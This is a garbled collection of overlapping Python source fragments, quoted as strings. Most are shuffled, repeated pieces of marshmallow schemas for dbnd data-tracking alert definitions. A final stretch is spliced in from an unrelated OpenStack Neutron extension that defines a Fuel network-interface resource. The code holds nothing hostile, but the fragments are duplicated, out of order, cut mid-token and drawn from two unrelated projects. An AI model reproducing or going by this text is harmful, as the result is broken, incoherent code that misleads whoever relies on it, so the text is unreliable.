dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer()", "for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name", "# Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields", "is not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True)", "= fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value =", "env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id =", "fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name", "datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid =", "only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function(", "obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load", "tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator", "fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == 
\"system\", dump_only=True, )", "fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\")", "Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g.", "fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name =", "ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta =", "self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source", "= fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name =", "import ApiStrictSchema from dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back", "= fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info", "obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job:", "None) if value is not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema):", "@pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value is", "type = fields.Str(required=True) 
user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at", "job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True)", "= fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert =", "metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by the UI affected_datasets =", "ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name =", "Type of MetricRule, found in dbnd_web. Used to build advanced_json metrics_rules = fields.List(fields.Dict(),", "= fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner", "= fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True)", ") def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self,", "= fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True)", "allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts", "used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda", "= fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = 
fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value =", "fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid =", "fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True)", "= fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name", "custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert #", "# Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type", "= fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str()", "project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid", "= fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load", "= fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if", "dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any) to filter stats", "dbnd_web. 
Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used", "data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric", "summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True)", "uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name", "dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert #", "MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type", "fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name", "= fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used to build advanced_json", "OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\",", "return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return", "severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value", "# Operation type (e.g. 
\"read\", \"write\", None=any) to filter stats by operation_type =", "fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime()", "fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid", "= fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE:", "= fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return", "= fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data:", "fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) #", "Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by", "obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value =", "fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True)", "fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict,", "= str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity", "created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") 
source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") #", "source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name =", "task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid", "= fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any) to filter stats by", "def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value is not", "type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value", "dbnd._core.tracking.schemas.base import ApiStrictSchema from dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float()", "= fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at =", "not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid", "fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\")", "= data.get(\"value\", None) if value is not None: data[\"value\"] = str(data[\"value\"]) return data", "for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. 
\"read\",", "is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj):", "data.get(\"value\", None) if value is not None: data[\"value\"] = str(data[\"value\"]) return data class", "advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by the UI affected_datasets", "= fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid", "= fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name", "alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any)", "fields.List(fields.Dict(), allow_none=True) # Used only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True,", "allow_none=True) # Used only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True)", "= fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True)", "TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\")", "= fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert =", "sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type =", "from dbnd._core.tracking.schemas.base import ApiStrictSchema from dbnd._vendor.marshmallow import fields, pre_load 
class MLAlert(ApiStrictSchema): sensitivity =", "value = data.get(\"value\", None) if value is not None: data[\"value\"] = str(data[\"value\"]) return", "advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True)", "data: dict, **kwargs): value = data.get(\"value\", None) if value is not None: data[\"value\"]", "scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for", "(e.g. \"read\", \"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True) # Type", "= fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid =", "def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj):", "def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return", "operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(),", "dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self,", "obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value", "user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name", "to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = 
fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert", "look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric =", "allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation", "# Type of MetricRule, found in dbnd_web. Used to build advanced_json metrics_rules =", "self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self,", "= fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value =", "= fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) #", "allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def", "type (e.g. 
\"read\", \"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True) #", "to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by the", "# -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids", "str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity =", "custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None)", "fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True)", "fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True)", "allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True)", "= fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env =", "obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None)", "build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only used by the UI" ]
[ "'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "None } }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex) return", "= [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-')", "neutron.api.v2 import attributes as attr from neutron.api.v2 import base from neutron.common import exceptions", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'pxe': { 'allow_post':", "'-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name,", "'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "None } }, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "None } }, 'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod", "<reponame>rmoe/fuel-neutron from neutron.api.extensions import ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes", "import base from neutron.common import exceptions as nexception from neutron import manager from", "'validate': { 'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } } }", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'interface_properties': {", 
"'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True }, 'tenant_id':", "import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\") NICS", "None } }, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import base from neutron.common", "None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "}, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed': {", "my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin", "class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel'", "'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put':", "'validate': { 'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible':", "attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name =", "collection_name = resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name)", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes':", "base from neutron.common import exceptions as nexception from neutron import manager from neutron.quota", "get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" 
my_plurals = [(key, key[:-1])", "attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s could not be found.\")", "'validate': { 'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible':", "'default': '', 'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put':", "import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import base from", "neutron.common import exceptions as nexception from neutron import manager from neutron.quota import resource_registry", "attr.NAME_MAX_LEN } }, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True) ex = extensions.ResourceExtension(collection_name, controller, path_prefix='fuel', attr_map=params) exts.append(ex)", "'2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key", "'id': { 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True", "'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True", "as attr from neutron.api.v2 import base from neutron.common import exceptions as nexception from", "= resource_name.replace('_', '-') + \"s\" params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller", "nexception from neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message =", "key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] 
attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for", "} class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return", "exceptions as nexception from neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound):", "None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_',", "import exceptions as nexception from neutron import manager from neutron.quota import resource_registry class", "from neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic", "True, 'default': '', 'validate': { 'type:string': None } }, 'driver': { 'allow_post': True,", "'default': '', 'validate': { 'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod", "'validate': { 'type:string': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible':", "neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message = _(\"Nic %(nic_id)s", "None } }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "} } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration' @classmethod", "'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False, 'allow_put': False, 'validate':", "'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:boolean':", "}, 'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", 
"'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac': {", "'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None } }, 'max_speed': { 'allow_post':", "}, 'mac': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post': True, 'allow_put': True, 'is_visible':", "as nexception from neutron import manager from neutron.quota import resource_registry class NicNotFound(nexception.NotFound): message", "Fuel' @classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals", "[(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL']", "plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name = resource_name.replace('_', '-') + \"s\"", "Ext Resources.\"\"\" my_plurals = [(key, key[:-1]) for key in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts =", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': attr.NAME_MAX_LEN } }, 'mac':", "'type:string': None } }, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name': { 'allow_post':", "'', 'validate': { 'type:string': None } } } } class Fuel(ExtensionDescriptor): @classmethod def", "None } } } } class Fuel(ExtensionDescriptor): @classmethod def get_name(self): return 'Fuel Integration'", "['nic']: collection_name = resource_name.replace('_', '-') + \"s\" 
params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict())", "in RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']:", "RESOURCE_ATTRIBUTE_MAP.keys()] attr.PLURALS.update(dict(my_plurals)) exts = [] plugin = manager.NeutronManager.get_service_plugins()['FUEL'] for resource_name in ['nic']: collection_name", "'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron", "None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '',", "from neutron.common import exceptions as nexception from neutron import manager from neutron.quota import", "{ 'allow_post': False, 'allow_put': False, 'validate': {'type:uuid': None}, 'is_visible': True, 'primary_key': True },", "True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } } } }", "@classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel'", "NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS: { 'id': { 'allow_post': False, 'allow_put':", "'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative': None }", "_(\"Nic %(nic_id)s could not be found.\") NICS = 'nics' RESOURCE_ATTRIBUTE_MAP = { NICS:", "'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'current_speed': { 'allow_post':", "'type:non_negative': None } }, 'driver': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default':", "'', 'validate': { 'type:string': None } }, 'interface_properties': { 'allow_post': True, 'allow_put': True,", "'fuel' @classmethod def get_description(self): return 'Integrates Neutron with Fuel' @classmethod def get_updated(self): return", "{ 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 
'type:string': attr.NAME_MAX_LEN", "'max_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative':", "get_name(self): return 'Fuel Integration' @classmethod def get_alias(self): return 'fuel' @classmethod def get_description(self): return", "RESOURCE_ATTRIBUTE_MAP.get(resource_name + \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True,", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'current_speed':", "'is_visible': True, 'default': '', 'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post':", "'', 'validate': { 'type:string': None } }, 'current_speed': { 'allow_post': True, 'allow_put': True,", "None}, 'is_visible': True, 'primary_key': True }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy':", "'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True }, 'name':", "'if_type': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string':", "+ \"s\", dict()) resource_registry.register_resource_by_name(resource_name) controller = base.create_resource(collection_name, resource_name, plugin, params, allow_bulk=True, allow_pagination=True, allow_sorting=True)", "}, 'pxe': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': {", "'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:string': None } }, 'interface_properties':", "} }, 'bus_info': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate':", "@classmethod def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals =", "True, 
